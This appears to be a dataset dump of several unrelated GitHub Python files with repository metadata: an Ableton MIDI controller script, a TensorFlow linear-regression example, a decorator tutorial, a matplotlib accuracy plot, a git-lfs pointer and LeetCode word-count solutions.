1ab4d96b3175a9f1c1ed07bdcdf9de41fe98944e | 632099ac0d895943cbbeb9048a2cdfcd21102411 | /Axiom_AIR_25_49_61/__init__.py | 456888a88e3b9d6b5be158e5d1745b620420cede | [] | no_license | Toniigor/AbletonLive9_RemoteScripts | 7f4bbf759a79629584413f6d1797005e8cd7f2ff | fed1e5ee61ea12ea6360107a65a6e666364353ff | refs/heads/master | 2021-01-16T21:19:25.330221 | 2014-06-06T12:33:03 | 2014-06-06T12:33:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | #Embedded file name: /Users/versonator/Jenkins/live/Projects/AppLive/Resources/MIDI Remote Scripts/Axiom_AIR_25_49_61/__init__.py
from Axiom_AIR_25_49_61 import Axiom_AIR_25_49_61
from _Framework.Capabilities import controller_id, inport, outport, CONTROLLER_ID_KEY, PORTS_KEY, NOTES_CC, SCRIPT
def get_capabilities():
return {CONTROLLER_ID_KEY: controller_id(vendor_id=1891, product_ids=[8243], model_name='Axiom AIR 49'),
PORTS_KEY: [inport(props=[NOTES_CC]),
inport(props=[SCRIPT]),
inport(props=[NOTES_CC]),
outport(props=[NOTES_CC]),
outport(props=[SCRIPT])]}
def create_instance(c_instance):
return Axiom_AIR_25_49_61(c_instance) | [
"julien@julienbayle.net"
] | julien@julienbayle.net |
4fa18cacdc15dddf259b9dda69a1697ed7fa9be0 | 5ab1130ae04735463fc44102adbe7d7072d9b8c9 | /pylearn/tensorflow/linear_regression_tf_contrib_learn.py | 9a9d2931d3ecbb9f377a94cafa2a573d69e8ac7f | [] | no_license | sigirisetti/python_projects | 8f917a6d052d7cb717f48fde8b791e4638ea821d | 123386b2f91be870e4795df14109142d7cd2eb96 | refs/heads/master | 2023-08-23T04:34:36.464290 | 2023-08-13T11:15:33 | 2023-08-13T11:15:33 | 130,079,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,441 | py | import tensorflow as tf
# NumPy is often used to load, manipulate and preprocess data.
import numpy as np
# Declare list of features. We only have one real-valued feature. There are many
# other types of columns that are more complicated and useful.
features = [tf.contrib.layers.real_valued_column("x", dimension=1)]
# An estimator is the front end to invoke training (fitting) and evaluation
# (inference). There are many predefined types like linear regression,
# logistic regression, linear classification, logistic classification, and
# many neural network classifiers and regressors. The following code
# provides an estimator that does linear regression.
estimator = tf.contrib.learn.LinearRegressor(feature_columns=features)
# TensorFlow provides many helper methods to read and set up data sets.
# Here we use `numpy_input_fn`. We have to tell the function how many batches
# of data (num_epochs) we want and how big each batch should be.
x = np.array([1., 2., 3., 4.])
y = np.array([0., -1., -2., -3.])
input_fn = tf.contrib.learn.io.numpy_input_fn({"x":x}, y, batch_size=4, num_epochs=1000)
# We can invoke 1000 training steps by invoking the `fit` method and passing the
# training data set.
estimator.fit(input_fn=input_fn, steps=1000)
# Here we evaluate how well our model did. In a real example, we would want
# to use a separate validation and testing data set to avoid overfitting.
estimator.evaluate(input_fn=input_fn) | [
"sigirisetti@yahoo.com"
] | sigirisetti@yahoo.com |
a806892617cccf3028b5001dfe9ff1c763831907 | 426f216e3d38d2030d337c8be6463cc4cd7af6c3 | /day04/decrator/main1.py | 14d6df4ce8c267532c3ae30ace6b10d6f046ab7d | [
"Apache-2.0"
] | permissive | zhangyage/Python-oldboy | c7b43801935fc9e08e973ee0b852daa8e8667fb7 | a95c1b465929e2be641e425fcb5e15b366800831 | refs/heads/master | 2021-01-23T02:59:37.574638 | 2019-10-27T05:35:58 | 2019-10-27T05:35:58 | 86,039,220 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
'''
装饰器学习
装饰器可以在我们为函数批量添加功能时候节省我们的工作量
'''
#装饰器函数
def outer(fun):
def wrapper(arg): #传递参数
print '验证' #在这里加入一行,在我们再次执行函数的时候就可以在多输出这一喊
reslute1 = fun(arg)
return reslute1 #这样使用可以是我们的函数带有返回值
print '就是这样做的'
return wrapper
@outer #和装饰器函数建立关系
def Func1(arg):
print 'func1',arg
return '返回在什么位置呢?'
respone = Func1('test')
print respone
| [
"zhangyage2015@163.com"
] | zhangyage2015@163.com |
db04af0f0c67badbff86956e43c7929a80ba4e8d | 11b420a9e6dbe371167227f41ef8e344e3382612 | /ConvNets/FINAL_Averaged_Experiments/ALL_RESULTS/ANALYSIS/Non_Linearity/Accuracy.py | b5403cb764d9b69b01bfad217db65070766d85f5 | [
"MIT"
] | permissive | tarek-ullah/Active-Learning-Bayesian-Convolutional-Neural-Networks | 7092386758b68dc922efaa2c2eba055930bf2896 | f8b68038bd3b97c473e9c1de6b6cdee4538021f4 | refs/heads/master | 2021-01-13T06:57:19.343775 | 2016-11-02T12:22:16 | 2016-11-02T12:22:16 | 81,338,773 | 1 | 0 | null | 2017-02-08T14:34:15 | 2017-02-08T14:34:15 | null | UTF-8 | Python | false | false | 1,230 | py | # http://www.scipy-lectures.org/intro/matplotlib/matplotlib.html
import numpy as np
import matplotlib.pyplot as plt
from pylab import *
from matplotlib import rc, rcParams
import matplotlib.dates as dates
# activate latex text rendering
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('font', weight='bold')
rcParams['text.latex.preamble'] = [r'\usepackage{sfmath} \boldmath']
Linear = np.load('Linear.npy')
ReLU = np.load('ReLU.npy')
Sigmoid = np.load('Sigmoid.npy')
TanH = np.load('TanH.npy')
Queries = np.arange(100, 1010, 10)
plt.figure(figsize=(12, 8), dpi=80)
plt.plot(Queries, Linear, color="red", linewidth=3.0, marker='x', label=r"\textbf{Linear}" )
plt.plot(Queries, ReLU, color="blue", linewidth=3.0, marker='x', label=r"\textbf{ReLU}" )
plt.plot(Queries, Sigmoid, color="black", linewidth=3.0, marker='x', label=r"\textbf{Sigmoid}" )
plt.plot(Queries, TanH, color="green", linewidth=3.0, marker='x', label=r"\textbf{TanH}" )
plt.xlabel(r'\textbf{Number of Labelled Samples}')
plt.ylabel(r'\textbf{Accuracy on Test Set}')
plt.title(r'\textbf{Signnificance of Non-Linearity in Bayesian ConvNet}')
plt.grid()
# Set x limits
# plt.xlim(1000.0, 10000.0)
# plt.ylim(0.8, 1.0)
plt.legend(loc = 4)
plt.show()
| [
"riashat.islam.93@gmail.com"
] | riashat.islam.93@gmail.com |
3cbba942bb011ade06f464f83e1eb6dd2f492c8e | 1fe8d4133981e53e88abf633046060b56fae883e | /venv/lib/python3.8/site-packages/tensorboard/compat/tensorflow_stub/flags 2.py | 769d1d5906e07cbbd043ad36316e3cfd2f9bfbf2 | [] | no_license | Akira331/flask-cifar10 | 6c49db8485038731ce67d23f0972b9574746c7a7 | 283e7a2867c77d4b6aba7aea9013bf241d35d76c | refs/heads/master | 2023-06-14T16:35:06.384755 | 2021-07-05T14:09:15 | 2021-07-05T14:09:15 | 382,864,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:8a51fcd6ca1170457f8161558624e113316ceaa217471a9e1325b2a82eb7c143
size 4235
| [
"business030301@gmail.com"
] | business030301@gmail.com |
b0e9ba0e3c917b392dd5109b88a13eb5eaacb52d | 72b77f97876983025eb05a5aa1d6f248a1be3074 | /count_words_obtained_after_adding_a_letter.py | 78069c6fffd0c81de8f3de2f4b842aeb3fabdf91 | [
"Apache-2.0"
] | permissive | erjan/coding_exercises | 4c6bccb2cdac65ccbc3107a482914275ecd157f7 | 68dac358a6d4dabd41d47dbd4addb2ec50e0ca11 | refs/heads/master | 2023-09-02T07:25:30.886175 | 2023-08-27T06:13:06 | 2023-08-27T06:13:06 | 236,281,070 | 5 | 0 | Apache-2.0 | 2020-05-05T15:08:49 | 2020-01-26T07:32:09 | Python | UTF-8 | Python | false | false | 2,824 | py | '''
You are given two 0-indexed arrays of strings startWords and targetWords. Each string consists of lowercase English letters only.
For each string in targetWords, check if it is possible to choose a string from startWords and perform a conversion operation on it to be equal to that from targetWords.
The conversion operation is described in the following two steps:
Append any lowercase letter that is not present in the string to its end.
For example, if the string is "abc", the letters 'd', 'e', or 'y' can be added to it, but not 'a'. If 'd' is added, the resulting string will be "abcd".
Rearrange the letters of the new string in any arbitrary order.
For example, "abcd" can be rearranged to "acbd", "bacd", "cbda", and so on. Note that it can also be rearranged to "abcd" itself.
Return the number of strings in targetWords that can be obtained by performing the operations on any string of startWords.
Note that you will only be verifying if the string in targetWords can be obtained from a string in startWords by performing the operations. The strings in startWords do not actually change during this process.
'''
class Solution:
def wordCount(self, startWords: List[str], targetWords: List[str]) -> int:
starts, ans = set(), 0
ans = 0
for word in startWords:
starts.add(''.join(sorted(word)))
for word in targetWords:
for i in range(len(word)):
if ''.join(sorted(word[:i] + word[i+1:])) in starts:
ans += 1
break
return ans
----------------------------------------------------------------------------------------
class Solution:
def wordCount(self, startWords: List[str], targetWords: List[str]) -> int:
# Sort each start word and add it to a hash set
startWords_sorted = set()
# O(S*26*log(26))
for word in startWords:
startWords_sorted.add("".join(sorted(list(word))))
# sort each target word and add it to a list
# O(T*26*log(26))
targetWords_sorted = []
for word in targetWords:
targetWords_sorted.append(sorted(list(word)))
# for each sorted target word, we remove a single character and
# check if the resulting word is in the startWords_sorted
# if it is, we increment cnt and break the inner loop
# otherwise we keep removing until we either find a hit or reach the
# end of the string
# O(T*26) = O(T)
cnt = 0
for target in targetWords_sorted:
for i in range(len(target)):
w = target[:i] + target[i+1:]
w = "".join(w)
if w in startWords_sorted:
cnt += 1
break
return cnt
| [
"noreply@github.com"
] | erjan.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.